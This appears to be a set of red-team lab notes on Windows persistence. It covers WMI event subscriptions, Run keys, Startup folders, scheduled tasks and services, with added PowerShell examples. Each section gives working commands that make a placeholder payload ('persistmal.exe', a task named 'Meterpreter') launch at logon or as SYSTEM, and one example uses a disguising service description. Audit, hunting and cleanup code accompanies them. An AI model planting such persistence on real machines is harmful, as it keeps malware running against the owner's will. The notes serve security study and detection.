WMI

Execute in cmd.exe in administrator mode: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="Meter", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"


Execute in Powershell.exe to verify: Get-WmiObject __EventFilter -Namespace root\subscription


Execute in cmd.exe in administrator mode: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Meter", ExecutablePath="C:\Users\User\Downloads\persistmal.exe",CommandLineTemplate="C:\Users\User\Downloads\persistmal.exe"


Execute in Powershell.exe to verify: Get-WmiObject CommandLineEventConsumer -Namespace root\subscription | Select-Object Name, ExecutablePath, CommandLineTemplate


Execute in cmd.exe in administrator mode: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Meter\"", Consumer="CommandLineEventConsumer.Name=\"Meter\""


Execute in Powershell.exe to verify: Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Select-Object Filter, Consumer


Reference: https://practicalsecurityanalytics.com/persistence-with-wmi-event-subscription-and-powershell-cradles/
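The three wmic steps above as one PowerShell script, added here as an example (it is not code from the original notes or from the linked reference). wmic is deprecated and no longer installed by default on recent Windows 11 builds; Set-WmiInstance creates the same objects. Two caveats: the filter as written fires on every 60-second poll in which the PerfOS_System instance changed, so the consumer is launched roughly once a minute rather than once; and nothing executes until the __FilterToConsumerBinding exists, which is also why that class is the right place to hunt. The name, payload path and the Get-WmiPersistence / Remove-WmiPersistence helper names are placeholders chosen for this example.

```powershell
# Added example, not code from the original notes. Requires an elevated
# PowerShell session. Name and payload path are the placeholders used above.
$Name    = 'Meter'
$Payload = 'C:\Users\User\Downloads\persistmal.exe'
$ns      = 'root\subscription'

# 1. Filter. WITHIN 60 polls once a minute, and a perf-counter instance
#    changes on every poll, so this fires about every 60 seconds.
$filter = Set-WmiInstance -Namespace $ns -Class __EventFilter -Arguments @{
    Name           = $Name
    EventNamespace = 'root\cimv2'
    QueryLanguage  = 'WQL'
    Query          = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " +
                     "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}

# 2. Consumer. The command runs as SYSTEM with WmiPrvSE.exe as its parent.
$consumer = Set-WmiInstance -Namespace $ns -Class CommandLineEventConsumer -Arguments @{
    Name                = $Name
    ExecutablePath      = $Payload
    CommandLineTemplate = $Payload
}

# 3. Binding. Nothing runs until this object exists.
Set-WmiInstance -Namespace $ns -Class __FilterToConsumerBinding -Arguments @{
    Filter   = $filter
    Consumer = $consumer
} | Out-Null

# Audit: every binding joined to its filter query and consumer command.
# A clean box has one binding, Microsoft's "SCM Event Log Filter" ->
# NTEventLogEventConsumer; anything else deserves a look. New bindings are
# also logged as event 5861 in Microsoft-Windows-WMI-Activity/Operational.
function Get-WmiPersistence {
    foreach ($b in (Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)) {
        # Filter/Consumer are relative object paths such as
        # __EventFilter.Name="Meter"; prefix the namespace to dereference them
        $f = [wmi]"\\.\${ns}:$($b.Filter)"
        $c = [wmi]"\\.\${ns}:$($b.Consumer)"
        [pscustomobject]@{
            Filter   = $f.Name
            Query    = $f.Query
            Consumer = $c.__CLASS
            Command  = $c.CommandLineTemplate   # empty for non-command-line consumers
        }
    }
}

# Cleanup: binding first, then consumer and filter
function Remove-WmiPersistence([string]$Name) {
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like "*Name=`"$Name`"*" } |
        Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer -Filter "Name='$Name'" | Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$Name'" | Remove-WmiObject
}

Get-WmiPersistence | Format-Table -AutoSize
# Remove-WmiPersistence $Name
```

Get-WmiObject / Set-WmiInstance exist in Windows PowerShell 5.1 but were removed from PowerShell 7; on 7 use Get-CimInstance / New-CimInstance with the same class and property names.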

------------------------------------------------------------------------------------------------------------


RunKey Registry


User-Level:


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce


System-Level (All Users):


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce


reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "CalcPersistence" /t REG_SZ /d "C:\Windows\System32\calc.exe" /f


reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "CalcPersistence" /f

---------------------------------------------------------------------------------------------------------------


Startup Folder

Current User:


C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


All Users:


C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
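A read-only audit of the autostart locations from the RunKey Registry and Startup Folder sections above, added here as an example (not code from the original notes). It walks the four Run/RunOnce keys, resolves .lnk files in both Startup folders to their targets, and flags entries whose binary lives outside the Windows and Program Files trees or is unsigned. The Wow6432Node keys, which 32-bit processes on 64-bit Windows read, are an addition not listed above; the helper names (Get-CommandExecutable, Test-SuspiciousPath, Get-AutostartEntries) are chosen for this example.

```powershell
# Added example, not code from the original notes. Read-only audit of the
# Run/RunOnce keys and Startup folders listed above.
$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    # Not in the notes: read by 32-bit processes on 64-bit Windows
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
)
$StartupFolders = @(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
)

# Extract the executable from a Run value, e.g.
#   "C:\Program Files\App\app.exe" /tray  ->  C:\Program Files\App\app.exe
#   %LOCALAPPDATA%\x\x.exe -q             ->  C:\Users\<user>\AppData\Local\x\x.exe
function Get-CommandExecutable([string]$Command) {
    $cmd = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    return ($cmd -split '\s+')[0]
}

# Heuristic only: anything outside the OS / Program Files trees is flagged.
# C:\Windows\Temp and C:\Windows\Tasks are user-writable and would pass;
# extend the list for your environment.
function Test-SuspiciousPath([string]$Path) {
    $trusted = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")
    foreach ($t in $trusted) {
        if ($t.Length -gt 1 -and $Path.StartsWith($t, [StringComparison]::OrdinalIgnoreCase)) { return $false }
    }
    return $true
}

function Get-SignatureStatus([string]$Path) {
    if (-not $Path -or -not (Test-Path -LiteralPath $Path -PathType Leaf)) { return 'NotFound' }
    (Get-AuthenticodeSignature -LiteralPath $Path).Status
}

function Get-AutostartEntries {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $k = Get-Item -LiteralPath $key          # Microsoft.Win32.RegistryKey
        foreach ($name in $k.GetValueNames()) {
            $exe = Get-CommandExecutable ([string]$k.GetValue($name))
            [pscustomobject]@{
                Location   = $key
                Name       = $name
                Target     = $exe
                Signature  = Get-SignatureStatus $exe
                Suspicious = Test-SuspiciousPath $exe
            }
        }
    }
    $shell = New-Object -ComObject WScript.Shell
    foreach ($dir in $StartupFolders) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($f in (Get-ChildItem -LiteralPath $dir -File)) {
            # Shortcuts are the common case; resolve them to their target
            $target = if ($f.Extension -eq '.lnk') { $shell.CreateShortcut($f.FullName).TargetPath } else { $f.FullName }
            [pscustomobject]@{
                Location   = $dir
                Name       = $f.Name
                Target     = $target
                Signature  = Get-SignatureStatus $target
                Suspicious = Test-SuspiciousPath $target
            }
        }
    }
}

Get-AutostartEntries | Where-Object { $_.Suspicious -or $_.Signature -ne 'Valid' } | Format-Table -AutoSize
```

Drop the Where-Object to see every entry. The CalcPersistence value from the reg add above points into C:\Windows\System32, so it would only show up through the path check if you change the target to a user-writable directory, which is the realistic case.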

-----------------------------------------------------------------------------------------------------------------


Scheduled Task

Add a task


schtasks /create /tn "Meterpreter" /tr "C:\Users\User\Downloads\persistmal.exe" /sc onlogon /rl highest /f


Verify the Task


schtasks /query /tn "Meterpreter"


Delete the Task (If Needed)


schtasks /delete /tn "Meterpreter" /f
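The same logon task built with the ScheduledTasks module, added here as an example (not code from the original notes). The module returns objects, so the verification step becomes a property check instead of parsing schtasks text, and the same function doubles as a hunting view over every task that starts at logon or boot. Registering with RunLevel Highest requires an elevated session. Task name and payload path are the placeholders used above; ConvertTo-TaskSummary and Get-LogonBootTasks are helper names chosen for this example.

```powershell
# Added example, not code from the original notes. Requires the
# ScheduledTasks module (Windows 8 / Server 2012 and later) and an
# elevated session for RunLevel Highest.
$TaskName = 'Meterpreter'
$Payload  = 'C:\Users\User\Downloads\persistmal.exe'
$User     = "$env:USERDOMAIN\$env:USERNAME"

$action    = New-ScheduledTaskAction -Execute $Payload
$trigger   = New-ScheduledTaskTrigger -AtLogOn -User $User        # this user's logon only
$principal = New-ScheduledTaskPrincipal -UserId $User -LogonType Interactive -RunLevel Highest
Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
                       -Principal $principal -Force | Out-Null

# Flatten a task object into the fields that matter for persistence review
function ConvertTo-TaskSummary($Task) {
    [pscustomobject]@{
        Name     = $Task.TaskName
        Path     = $Task.TaskPath
        State    = $Task.State
        User     = $Task.Principal.UserId
        RunLevel = $Task.Principal.RunLevel
        Triggers = ($Task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task' }) -join ','
        Actions  = ($Task.Actions  | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        LastRun  = (Get-ScheduledTaskInfo -InputObject $Task).LastRunTime
    }
}

# Verify the task we just registered
ConvertTo-TaskSummary (Get-ScheduledTask -TaskName $TaskName)

# Hunting view: every enabled task with a logon or boot trigger and what it runs
function Get-LogonBootTasks {
    Get-ScheduledTask | Where-Object {
        $_.State -ne 'Disabled' -and
        ($_.Triggers | Where-Object { $_.CimClass.CimClassName -in 'MSFT_TaskLogonTrigger', 'MSFT_TaskBootTrigger' })
    } | ForEach-Object { ConvertTo-TaskSummary $_ }
}
Get-LogonBootTasks | Format-Table -AutoSize

# The XML is what lands under C:\Windows\System32\Tasks\<name>, and what
# Security event 4698 records when task-creation auditing is enabled
Export-ScheduledTask -TaskName $TaskName

# Cleanup, equivalent to schtasks /delete
Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
```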

------------------------------------------------------------------------------------------------------------------

Services

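Service-based persistence, added here as an example (not code from the original notes): sc.exe creates a service from any binary path without validating it, so the pattern mirrors the other sections, create, verify, delete. The important caveat is that the Service Control Manager expects the binary to call StartServiceCtrlDispatcher shortly after launch; a plain executable does get started, but the SCM kills it after the timeout (about 30 seconds) and reports error 1053, so a real service binary or a service wrapper is needed for anything long-lived. Service name, display name and payload path are placeholders chosen for this example, as is the Get-ServiceBinary helper. Requires an elevated session.

```powershell
# Added example, not code from the original notes. Requires an elevated session.
$SvcName = 'MeterSvc'
$Payload = 'C:\Users\User\Downloads\persistmal.exe'

# sc.exe needs the space after each "option=" token; PowerShell passes
# "binPath=" and the path as two separate arguments, which is what it wants.
sc.exe create $SvcName binPath= "$Payload" start= auto DisplayName= "Meter Service"
sc.exe description $SvcName "Telemetry helper"      # cosmetic

# Verify the definition. The same data is stored under
# HKLM\SYSTEM\CurrentControlSet\Services\<name> and the install is
# logged as event 7045 in the System log, which is what defenders watch.
sc.exe qc $SvcName

# Start now instead of waiting for a reboot. A non-service binary runs,
# then gets killed and the start fails with error 1053 (see caveat above).
sc.exe start $SvcName

# Object view of what runs and as whom; Get-Service does not expose the path
function Get-ServiceBinary([string]$Name) {
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    [pscustomobject]@{
        Name      = $svc.Name
        State     = $svc.State
        StartMode = $svc.StartMode
        Account   = $svc.StartName      # LocalSystem unless obj= was given
        Path      = $svc.PathName
    }
}
Get-ServiceBinary $SvcName

# Cleanup: delete is queued until the service is stopped
sc.exe stop $SvcName
sc.exe delete $SvcName
```

The same Get-ServiceBinary query run without the -Filter, over every service whose PathName is outside C:\Windows or Program Files, is the quickest hunt for this technique.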